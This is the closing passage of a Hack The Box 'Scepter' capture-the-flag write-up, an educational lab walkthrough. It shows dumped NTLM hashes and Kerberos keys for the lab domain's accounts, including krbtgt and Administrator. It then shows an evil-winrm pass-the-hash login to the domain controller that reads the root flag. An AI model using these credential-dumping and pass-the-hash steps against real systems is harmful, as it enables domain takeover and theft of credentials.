scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:90594ff6a706542e6e5f83a4f8108dc9f203b2fa12d512cdc7180ba41fd46c38
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:a875ed3af2f895dfc8940fdc48eac5ea
scepter.htb\a.carter:des-cbc-md5:3d267fd95eab6883
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up...

And now fetch our root flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
4d44c8793e7ff83f2a5673fd718eeb03
*Evil-WinRM* PS C:\Users\Administrator\Documents>

That was it for scepter, hope you learned something new!

-0xkujen

  • Title: Hackthebox: Scepter
  • Author: Foued SAIDI
  • Created at : 2025-07-18 11:23:45
  • Updated at : 2025-07-18 14:10:32
  • Link: https://kujen5.github.io/2025/07/18/Hackthebox-Scepter/
  • License: This work is licensed under CC BY-NC-SA 4.0.